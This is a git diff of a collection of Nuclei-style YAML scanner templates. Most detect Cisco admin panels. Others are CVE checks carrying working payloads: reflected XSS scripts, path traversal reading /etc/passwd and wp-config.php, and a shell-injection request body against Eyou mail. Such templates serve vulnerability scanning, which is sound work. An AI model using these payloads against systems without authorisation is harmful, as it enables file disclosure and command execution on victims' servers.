b/poc/cisco/cisco-edge-340.yaml index 15a2a5bb06..17a60b6a18 100644 --- a/poc/cisco/cisco-edge-340.yaml +++ b/poc/cisco/cisco-edge-340.yaml @@ -1,20 +1,14 @@ id: cisco-edge-340 info: - name: Cisco Edge 340 Panel - Detect + name: Cisco Edge 340 author: dhiyaneshDk severity: info - description: Cisco Edge 340 panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - shodan-query: http.title:"Cisco Edge 340" tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Edge 340"' -http: +requests: - method: GET path: - "{{BaseURL}}/auth/?next=%2F" @@ -29,5 +23,3 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f3306c86253f0cb57ee742ac5bb06400b1a4204d1c9374ecd2cfb0c494304222022100a7136403fbb1c2cf02bced97e455c6a46474707632497b698964174880c29233:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-finesse-login-938.yaml b/poc/cisco/cisco-finesse-login-938.yaml deleted file mode 100644 index 0944959e91..0000000000 --- a/poc/cisco/cisco-finesse-login-938.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cisco-finesse-login - -info: - name: Cisco Finesse Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6824 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in to Cisco Finesse' - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-finesse-login-940.yaml b/poc/cisco/cisco-finesse-login-940.yaml new file mode 100644 index 0000000000..ad8938564b --- /dev/null +++ b/poc/cisco/cisco-finesse-login-940.yaml @@ -0,0 +1,23 @@ +id: cisco-finesse-login + +info: + name: Cisco Finesse Login + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6824 + tags: panel,cisco + +requests: + - method: GET + path: + - '{{BaseURL}}/desktop/container/landing.jsp?locale=en_US' + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in to Cisco Finesse' + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-integrated-login-941.yaml b/poc/cisco/cisco-integrated-login-941.yaml index 0804d5a189..5f716a0018 100644 --- a/poc/cisco/cisco-integrated-login-941.yaml +++ b/poc/cisco/cisco-integrated-login-941.yaml @@ -4,7 +4,8 @@ info: name: Cisco Integrated Management Controller Login author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/3859 + reference: + - https://www.exploit-db.com/ghdb/3859 tags: panel,cisco requests: diff --git a/poc/cisco/cisco-meraki-exposure-944.yaml b/poc/cisco/cisco-meraki-exposure-944.yaml new file mode 100644 index 0000000000..112800ebd8 --- /dev/null +++ b/poc/cisco/cisco-meraki-exposure-944.yaml @@ -0,0 +1,25 @@ +id: cisco-meraki-exposure + +info: + name: Cisco Meraki cloud & security Appliances Information Disclosure + author: dhiyaneshDK,r3naissance + severity: info + reference: https://www.exploit-db.com/ghdb/6708 + tags: panel,cisco,meraki,disclosure + +requests: + - method: GET + path: + - '{{BaseURL}}/#connection' + + matchers-condition: and + matchers: + - type: word + words: + - 'Your client connection' + - 'This security appliance is directly connected to a local network' + condition: and + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-meraki-exposure-946.yaml b/poc/cisco/cisco-meraki-exposure-946.yaml deleted file mode 100644 index d14835d3a6..0000000000 --- a/poc/cisco/cisco-meraki-exposure-946.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cisco-meraki-exposure - -info: - name: Cisco Meraki cloud & security Appliances Information Disclosure - author: dhiyaneshDK,r3naissance - severity: info - reference: - - https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco,meraki,disclosure - -requests: - - method: GET - path: - - '{{BaseURL}}/#connection' - - matchers-condition: and - matchers: - - type: word - words: - - 'Your client connection' - - 'This security appliance is directly connected to a local network' - condition: and - - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-network-config-949.yaml b/poc/cisco/cisco-network-config-949.yaml deleted file mode 100644 index e5a21f122b..0000000000 --- a/poc/cisco/cisco-network-config-949.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: cisco-network-config - -info: - name: Cisco System Network Configuration Page - Detect - author: DhiyaneshDk - severity: info - description: Cisco System Network configuration page was detected. Page lists whole network configuration and internal logs of Cisco IP phones. - reference: - - https://www.exploit-db.com/ghdb/5430 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: exposure,cisco,edb,config - -http: - - method: GET - path: - - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration" - - matchers-condition: and - matchers: - - type: word - words: - - "Network Configuration" - part: body - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100813e9973d7d1eb4268049f244920487c3e1e8c5f9b58215265196a714355dc5402205619213595d60a04fcca831907236db30ba7efba530002f8c6b8637ace9f53dc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/cisco/cisco-network-config.yaml b/poc/cisco/cisco-network-config.yaml new file mode 100644 index 0000000000..a1de4cc36a --- /dev/null +++ b/poc/cisco/cisco-network-config.yaml @@ -0,0 +1,24 @@ +id: cisco-network-config + +info: + name: Cisco System Network Configuration Exposure + author: DhiyaneshDk + severity: low + reference: https://www.exploit-db.com/ghdb/5430 + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/CGI/Java/Serviceability?adapter=device.statistics.configuration" + + matchers-condition: and + matchers: + - type: word + words: + - "Network Configuration" + part: body + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-prime-infrastructure-952.yaml b/poc/cisco/cisco-prime-infrastructure-952.yaml deleted file mode 100644 index 1ef40b53b8..0000000000 --- a/poc/cisco/cisco-prime-infrastructure-952.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cisco-prime-infrastructure - -info: - name: Cisco Prime Infrastructure - author: dhiyaneshDk - severity: info - metadata: - shodan-query: 'http.title:"prime infrastructure"' - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/webacs/pages/common/login.jsp" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'productName = "Prime Infrastructure"' - - "Cisco " - - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-prime-infrastructure-954.yaml b/poc/cisco/cisco-prime-infrastructure-954.yaml new file mode 100644 index 0000000000..2b4d60a237 --- /dev/null +++ b/poc/cisco/cisco-prime-infrastructure-954.yaml @@ -0,0 +1,26 @@ +id: cisco-prime-infrastructure + +info: + name: Cisco Prime Infrastructure + author: dhiyaneshDk + severity: info + metadata: + shodan-query: http.title:"prime infrastructure" + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/webacs/pages/common/login.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'productName = "Prime Infrastructure"' + - "Cisco " + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-sd-wan-955.yaml b/poc/cisco/cisco-sd-wan-955.yaml new file mode 100644 index 0000000000..6376c9a8ca --- /dev/null +++ b/poc/cisco/cisco-sd-wan-955.yaml @@ -0,0 +1,25 @@ +id: cisco-sd-wan + +info: + name: Cisco SD-WAN panel + author: z3bd + severity: info + reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj + tags: panel,cisco + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: status + status: + - 200 + + - type: word + words: + - "SD-Wan Center" + part: body \ No newline at end of file diff --git a/poc/cisco/cisco-sd-wan-957.yaml b/poc/cisco/cisco-sd-wan-957.yaml deleted file mode 100644 index 0f9113cc89..0000000000 --- a/poc/cisco/cisco-sd-wan-957.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cisco-sd-wan - -info: - name: Cisco SD-WAN panel - author: z3bd - severity: info - reference: - - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - - type: status - status: - - 200 - - - type: word - words: - - "SD-Wan Center" - part: body \ No newline at end of file diff --git a/poc/cisco/cisco-secure-desktop-962.yaml b/poc/cisco/cisco-secure-desktop-962.yaml deleted file mode 100644 index dda557dd62..0000000000 --- a/poc/cisco/cisco-secure-desktop-962.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: cisco-secure-desktop - -info: - name: Cisco Secure Desktop - author: pdteam - severity: info - tags: cisco,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/CACHE/sdesktop/install/start.htm" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - words: - - "Installation" - - "WebLaunch" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-security-details-963.yaml b/poc/cisco/cisco-security-details-963.yaml deleted file mode 100644 index 8ebd1577a1..0000000000 --- a/poc/cisco/cisco-security-details-963.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: cisco-security-details - -info: - name: Cisco Meraki cloud & Security Appliance details - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6708 - tags: panel,cisco - -requests: - - method: GET - path: - - '{{BaseURL}}/#connection' - - matchers-condition: and - matchers: - - type: word - words: - - 'Your client connection' - - type: status - status: - - 200 diff --git a/poc/cisco/cisco-security-details.yaml b/poc/cisco/cisco-security-details.yaml index 8ddd313415..8ebd1577a1 100644 --- a/poc/cisco/cisco-security-details.yaml +++ b/poc/cisco/cisco-security-details.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6708 - tags: cisco + tags: panel,cisco requests: - method: GET diff --git a/poc/cisco/cisco-smi-exposure-970.yaml b/poc/cisco/cisco-smi-exposure-970.yaml index 212bbf0f1b..c5a6584dd8 100644 --- a/poc/cisco/cisco-smi-exposure-970.yaml +++ b/poc/cisco/cisco-smi-exposure-970.yaml @@ -4,17 +4,17 @@ info: name: Cisco Smart Install Endpoints Exposure author: dwisiswant0 severity: info - description: | - This template attempts & supports the detection part only by - connecting to the specified Cisco Smart Install port and determines - if it speaks the Smart Install Protocol. Exposure of SMI to - untrusted networks can allow complete compromise of the switch. + description: Cisco Smart Install endpoints were discovered. Exposure of SMI to untrusted networks could allow complete compromise of the switch. reference: - https://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html - https://blogs.cisco.com/security/cisco-psirt-mitigating-and-detecting-potential-abuse-of-cisco-smart-install-feature - https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi - https://github.com/Cisco-Talos/smi_check/blob/master/smi_check.py#L52-L53 - https://github.com/Sab0tag3d/SIET + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 tags: network,cisco,smi,exposure network: @@ -24,10 +24,12 @@ network: host: - "{{Hostname}}" - - "{{Hostname}}:4786" + - "{{Host}}:4786" matchers: - type: word encoding: hex words: - "000000040000000000000003000000080000000100000000" + +# Enhanced by mp on 2022/03/30 diff --git a/poc/cisco/cisco-smi-exposure-972.yaml b/poc/cisco/cisco-smi-exposure-971.yaml similarity index 100% rename from poc/cisco/cisco-smi-exposure-972.yaml rename to poc/cisco/cisco-smi-exposure-971.yaml diff --git a/poc/cisco/cisco-systems-login-973.yaml b/poc/cisco/cisco-systems-login-973.yaml new file mode 100644 index 0000000000..25607b3bbf --- /dev/null +++ b/poc/cisco/cisco-systems-login-973.yaml @@ -0,0 +1,25 @@ +id: cisco-systems-login + +info: + name: Cisco Systems Login + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan-query: 'http.title:"Cisco Systems Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Cisco Systems Login" + + - type: status + status: + - 200 diff --git a/poc/cisco/cisco-systems-login-975.yaml b/poc/cisco/cisco-systems-login-975.yaml deleted file mode 100644 index 96ae7b9ee4..0000000000 --- a/poc/cisco/cisco-systems-login-975.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: cisco-systems-login - -info: - name: Cisco Systems Login - author: dhiyaneshDk,idealphase - severity: info - metadata: - shodan-query: http.title:"Cisco Systems Login" - google-query: intitle:"Cisco Systems Login" - tags: panel,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Cisco Systems Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - group: 1 - regex: - - '" - part: body + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 +# digest: 490a0046304402202ba7daa26a5fc43e928478cd0bb41f984b038554dfbb28f4890464f2d2957ac802201d20b2c66c1505867a2acb23a34256a7d8cc2faabc161373f2dc452c1260e110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2012-4768.yaml b/poc/cve/CVE-2012-4768.yaml index 7d55437591..53376bfbe0 100644 --- a/poc/cve/CVE-2012-4768.yaml +++ b/poc/cve/CVE-2012-4768.yaml @@ -1,32 +1,50 @@ id: CVE-2012-4768 + info: - name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting + name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + remediation: | + Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2012-4768 - tags: cve,cve2012,wordpress,xss,wp-plugin -requests: + cwe-id: CWE-79 + epss-score: 0.00922 + epss-percentile: 0.81121 + cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mikejolley + product: download_monitor + framework: wordpress + tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress + +http: - method: GET path: - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100a811b98b0ef138d5be2fd89bf6dd2a3c4616309c57583130f1783c44cd5a35450220679f9e9db3efbc9ed3235239e5b210b08b1e3269a7af04417434e5fcc5bf6462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2013-5528.yaml b/poc/cve/CVE-2013-5528.yaml index 7d9cb08ce8..054a82604c 100644 --- a/poc/cve/CVE-2013-5528.yaml +++ b/poc/cve/CVE-2013-5528.yaml @@ -3,35 +3,25 @@ id: CVE-2013-5528 info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo - severity: medium + severity: high description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 - remediation: | - Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 + - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N - cvss-score: 4 cve-id: CVE-2013-5528 - cwe-id: CWE-22 - epss-score: 0.00565 - epss-percentile: 0.75227 - cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: cisco - product: unified_communications_manager - tags: cve,cve2013,lfi,cisco,edb + tags: cve,cve2013,lfi,cisco -http: +requests: - method: GET path: - "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd" matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0:" @@ -39,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e40cf01d702727f203c87effa4494b88a1b47a9e12b757c887756f011c79ba39022026d9e052a5913633d04c92307373c167fceb68b9c4787dfe79720316c5a8000a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2013-5979.yaml b/poc/cve/CVE-2013-5979.yaml index 7ad29aa3ce..1149dd7311 100644 --- a/poc/cve/CVE-2013-5979.yaml +++ b/poc/cve/CVE-2013-5979.yaml @@ -1,5 +1,4 @@ id: CVE-2013-5979 - info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo @@ -13,19 +12,15 @@ info: classification: cve-id: CVE-2013-5979 tags: cve,cve2013,lfi - requests: - method: GET path: - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828" - matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 diff --git a/poc/cve/CVE-2013-6281.yaml b/poc/cve/CVE-2013-6281.yaml index d08cfdb755..7ab90646ab 100644 --- a/poc/cve/CVE-2013-6281.yaml +++ b/poc/cve/CVE-2013-6281.yaml @@ -1,29 +1,41 @@ id: CVE-2013-6281 + info: - name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS + name: WordPress Spreadsheet - Cross-Site Scripting author: random-robbie severity: medium description: | - The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability. + WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + remediation: | + Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - https://wordpress.org/plugins/dhtmlxspreadsheet/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 + - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 + epss-score: 0.00209 + epss-percentile: 0.5874 + cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: - google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet - verified: "true" - tags: cve,cve2013,wordpress,xss,wp-plugin,wp -requests: + verified: true + max-request: 1 + vendor: dhtmlx + product: dhtmlxspreadsheet + framework: wordpress + google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet + tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin + +http: - raw: - | GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word @@ -32,10 +44,13 @@ requests: - "page: ''" - "dhx_rel_path" condition: and + - type: word part: header words: - text/html + - type: status status: - 200 +# digest: 4a0a004730450221009258243f6f89c6c0f9abe00718f894f072068078fd7fa622711c2f69e9bc8d510220646c38aaefdb3381b352305dd20213fa4934849febbdabb7ddad04c51ceadd82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2013-7240.yaml b/poc/cve/CVE-2013-7240.yaml index 6ad0335e9a..c817f7a100 100644 --- a/poc/cve/CVE-2013-7240.yaml +++ b/poc/cve/CVE-2013-7240.yaml @@ -3,21 +3,32 @@ id: CVE-2013-7240 info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + remediation: | + Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ - http://seclists.org/oss-sec/2013/q4/570 + - http://seclists.org/oss-sec/2013/q4/566 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 - tags: cve,cve2013,wordpress,wp-plugin,lfi + epss-score: 0.23987 + epss-percentile: 0.96126 + cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: westerndeal + product: advanced_dewplayer + google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" + tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' @@ -25,16 +36,15 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" - part: body condition: and - type: status status: - 200 - -# Enhanced by mp on 2022/02/24 +# digest: 4a0a00473045022003fbde35c84873598fcc4a0e096edcbd88b729b21b95c3cda42383e4832bbd56022100809a35e79e694fe5f91ab004c92b24a914ead823581da6aae2a824b7123745ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-1203.yaml b/poc/cve/CVE-2014-1203.yaml index 913e32045e..744b0ec237 100644 --- a/poc/cve/CVE-2014-1203.yaml +++ b/poc/cve/CVE-2014-1203.yaml @@ -1,12 +1,9 @@ id: CVE-2014-1203 - info: name: Eyou E-Mail <3.6 - Remote Code Execution author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. - remediation: | - Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 @@ -16,16 +13,8 @@ info: cvss-score: 9.8 cve-id: CVE-2014-1203 cwe-id: CWE-77 - epss-score: 0.02045 - epss-percentile: 0.87728 - cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: eyou - product: eyou - tags: seclists,rce,eyou - -http: + tags: rce,eyou +requests: - raw: - | POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1 @@ -33,15 +22,14 @@ http: Content-Type: application/x-www-form-urlencoded type='|cat /etc/passwd||' - matchers-condition: and matchers: - type: regex - part: body regex: - "root:.*:0:0:" - + part: body - type: status status: - 200 -# digest: 490a00463044022053d12c348a221483a7a3d354dcd0f37cf0198da0b99487ac1c83147f2ecb0d0a022039d34a443cb35d077b9e070038aed29a706d02de7e0219dc16fe1860901ca564:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/01 diff --git a/poc/cve/CVE-2014-2962.yaml b/poc/cve/CVE-2014-2962.yaml index 2456af7a2e..55347eb471 100644 --- a/poc/cve/CVE-2014-2962.yaml +++ b/poc/cve/CVE-2014-2962.yaml @@ -1,25 +1,43 @@ id: CVE-2014-2962 info: - name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + name: Belkin N150 Router 1.00.08/1.00.09 - Path Traversal author: daffainfo severity: high - description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - reference: https://www.exploit-db.com/exploits/38488 + description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources. + reference: + - https://www.kb.cert.org/vuls/id/774788 + - https://nvd.nist.gov/vuln/detail/CVE-2014-2962l + - http://www.kb.cert.org/vuls/id/774788 + - http://www.belkin.com/us/support-article?articleNum=109400 + - https://www.exploit-db.com/exploits/38488/ + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 + cve-id: CVE-2014-2962 + cwe-id: CWE-22 + epss-score: 0.95825 + epss-percentile: 0.99281 + cpe: cpe:2.3:o:belkin:n150_f9k1009_firmware:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: belkin + product: n150_f9k1009_firmware tags: cve,cve2014,lfi,router,firmware,traversal -requests: +http: - method: GET path: - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 +# digest: 4a0a0047304502200dd2a5cead319121ffaf0a5a1f33bcd326c4373101b2d220bbe38cddcf5df02d022100f6b9132a21f2b0eaf545ce82419e46d7e69e8f5317812e554295b399b8181a19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-4561.yaml b/poc/cve/CVE-2014-4561.yaml index df0366682b..aaffe503df 100644 --- a/poc/cve/CVE-2014-4561.yaml +++ b/poc/cve/CVE-2014-4561.yaml @@ -1,12 +1,9 @@ id: CVE-2014-4561 - info: - name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting + name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting author: daffainfo severity: medium description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability. - remediation: | - Upgrade to a patched version of the Ultimate Weather Plugin that addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/5c358ef6-8059-4767-8bcb-418a45b2352d - https://nvd.nist.gov/vuln/detail/CVE-2014-4561 @@ -16,34 +13,23 @@ info: cvss-score: 6.1 cve-id: CVE-2014-4561 cwe-id: CWE-79 - epss-score: 0.00098 - epss-percentile: 0.40523 - cpe: cpe:2.3:a:ultimate-weather_project:ultimate-weather:1.0:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: ultimate-weather_project - product: ultimate-weather - framework: wordpress - tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth - -http: + tags: cve,cve2014,wordpress,wp-plugin,xss,weather +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - '">' - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 4b0a00483046022100d571f0fd3851cac5e9536f1eab9243f3d617ea77f5a2f4c807e87a0a9fa6e3a9022100cbea57a0141cb206370416a15348231e84c67d9fbb8fdf54d6ec16830772ed69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-4940.yaml b/poc/cve/CVE-2014-4940.yaml index 4892b44bfb..13f17a9af9 100644 --- a/poc/cve/CVE-2014-4940.yaml +++ b/poc/cve/CVE-2014-4940.yaml @@ -1,39 +1,26 @@ id: CVE-2014-4940 info: - name: WordPress Plugin Tera Charts - Local File Inclusion + name: WordPress Plugin Tera Charts - Directory Traversal author: daffainfo - severity: medium - description: Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. - remediation: | - Update to the latest version of the Tera Charts plugin to fix the local file inclusion vulnerability. + severity: high + description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-4940 - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=851874%40tera-charts&old=799253%40tera-charts&sfp_email=&sfph_mail= - http://codevigilant.com/disclosure/wp-plugin-tera-chart-local-file-inclusion/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cvss-score: 5 cve-id: 